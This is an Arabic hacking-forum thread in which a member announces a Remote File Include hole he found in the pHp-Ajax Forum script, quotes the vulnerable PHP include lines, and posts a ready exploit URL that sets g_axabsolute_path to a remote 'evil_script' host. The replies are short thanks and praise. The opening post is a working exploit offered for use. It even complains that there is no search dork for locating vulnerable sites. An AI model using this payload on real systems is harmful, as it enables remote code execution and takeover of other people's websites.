حالة الموضوع:
مغلق
  1. DarK c0d3r

    DarK c0d3r Developer

    الأنتساب:
    ‏12 أكتوبر 2011
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    :: السلام عليــكم ورحمــة الله وبركــآته ::


    مســـآكم الله بآلخير


    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^

    اليوٍم وانــآ افرفرٍ وافحص السكربتــآت الحمد لله تم اكتشآف ثغرٍهـ بسكربت منتديــآت

    pHp-Ajax Forum من نوٍع Remote File Include

    بس للاسف الثغرٍهـ مالهــآ Dork .< عليكم [​IMG]

    سورس الثغرٍهـ

    كود PHP:
    ============================================== php-Ajax Forum Remote File Include Vulnerability ==============================================  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  php-Ajax Forum Remote File Include Vulnerability  Download http://mumsai.axiologic.net/download.php?id=3  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=        o   \ o /  _ o        __|    \ /    |__         o _  \ o /   o     /|\    |     /\   __\o   \o    |    o/    o/__   /\     |    /|\     / \   / \   | \  /) |    ( \  /o\  / )    |  (\  / |   / \   / \       Discovered by: DarK c0d3r - agramksa[at]w.cn   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  CODE:  include($g_axabsolute_path.FORUM_LOGIC."/configs/constantes.php"); include($g_axabsolute_path.FORUM_LOGIC."/configs/custom_configs.php"); include($g_axabsolute_path.FORUM_LOGIC.DIRECTORY_SEPARATOR. "/language/$lang"."_lang.php"); include($g_axabsolute_path.UI_MODULE .DIRECTORY_SEPARATOR. "template_functions.php"); include($g_axabsolute_path.UI_MODULE .DIRECTORY_SEPARATOR. "template.php");  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  Exploit:  http://target/[script_path]/forum_ui/index.php?g_axabsolute_path=http://evil_script?  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  # IQ-T34M.HOST.ORG [2010]
     
  2. DarK c0d3r

    DarK c0d3r Developer

    الأنتساب:
    ‏12 أكتوبر 2011
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
  3. ابو حمامه

    ابو حمامه Developer

    الأنتساب:
    ‏27 أكتوبر 2011
    المشاركات:
    69
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    الصومال
    رد: ثغرٍة منتديــآت pHp-Ajax Forum ( آكتشــــآفي ).*!

    مشكور اخويه)4:"
     
  4. أحمد عآدل

    أحمد عآدل Developer

    الأنتساب:
    ‏2 نوفمبر 2011
    المشاركات:
    31
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    جده
    رد: ثغرٍة منتديــآت pHp-Ajax Forum ( آكتشــــآفي ).*!

    مشكور اخي !:"
     
  5. منير

    منير Guest

    رد: ثغرٍة منتديــآت pHp-Ajax Forum ( آكتشــــآفي ).*!

    أبداااااااااع وربي )5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة